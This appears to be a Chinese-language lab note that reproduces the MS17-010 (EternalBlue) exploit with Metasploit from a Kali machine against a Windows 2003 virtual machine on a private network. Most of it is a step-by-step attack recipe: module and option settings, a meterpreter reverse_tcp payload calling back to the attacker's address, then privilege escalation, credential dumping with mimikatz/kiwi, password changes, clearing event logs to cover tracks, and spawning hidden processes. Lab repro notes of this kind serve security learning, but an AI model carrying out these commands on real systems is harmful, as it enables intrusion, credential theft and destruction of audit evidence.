Ox00 前言

  • Kali:192.168.88.133
  • Win2003:192.168.88.137

Ox01 msfconsol工具

  • sudo msfconsol
  • search ms17_010

image.png 1:扫描ms17_010 2:Win7x64利用 4:通用利用


Ox02 扫描

  • 打开模块
    • use 1 或 exploit/windows/smb/ms17_010_psexec
  • 设置靶机的 IP 和端口
    • set RHOSTS 192.168.88.137
    • set RPORT 445 【默认端口】
    • run

image.png

  • END

Ox03 攻击

  • 打开模块
    • use 4 或 exploit/windows/smb/ms17_010_psexec
  • 查看需要设置的信息
    • show options
  • 设置靶机的 IP 和端口
    • set RHOSTS 192.168.88.137
    • set RPORT 445 【默认端口】
  • 设置攻击使用的 payload
    • set payload windows/meterpreter/reverse_tcp
    • set lhost 192.168.88.133 或 set lhost
    • set lport 4444 【默认端口】
  • 进行攻击
    • exploit
  • 得到 meterpreter

image.png


Ox04 利用

  • 参考链接
  • 查看权限
    • getuid 如果需要提权则 getsystem
    • image.png
  • 使用mimikatz(现kiwi)
    • load mimikatz 或 load wiki
    • image.png
  • 列出所有帐户列表
    • creds_all
    • image.png
  • 修改密码命令
    • password_change
    • image.png
  • 清除事件日志
    • clearev
    • image.png
  • 额外内容
  • 先查看目标主机安装了哪些应用
    • run post/windows/gather/enum_applications
    • image.png
  • 先查看目标主机有哪些用户
    • image.png
  • END

Ox05 SHELL

  • 命令shell可进入目标系统的shell,Window为CMD
    • image.png
  • kiwi可使用execute创建进程

-f:指定可执行文件 -H:创建一个隐藏进程 -a:传递给命令的参数 -i:  跟进程进行交互 -m:从内存中执行 -t: 使用当前伪造的线程令牌运行进程 -s: 在给定会话中执行进程

  • execute -i -f cmd

  • 乱码问题

    • Linux默认为UTF-8编码,中文Windows默认为GBK/GB2312
    • 所以该通道流在显示时会发生编码问题
    1. 通过修改CMD编码流
      1. chcp 65001
    2. 通过修改SSH编码流
      1. image.png
    • image.png
  • 查询权限

    • image.png
  • 查询系统信息及补丁

    • image.png
    • image.png
  • END


OxFF 后记

参考链接

【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法 - Bay0net - 博客园 https://www.cnblogs.com/v1vvwv/p/ms17-010-exploit.html Metasploit-进阶用户密码与mimikatz模块kiwi模块_CSDN-wpsec-CSDN博客 https://blog.csdn.net/qq_38626043/article/details/109388147 Metasploit Framework(MSF)的使用 - 墨鱼菜鸡 - 博客园 https://www.cnblogs.com/csnd/p/11807588.html windows CMD实现的信息收集工具 - 墨鱼菜鸡 - 博客园 https://www.cnblogs.com/csnd/p/12580924.html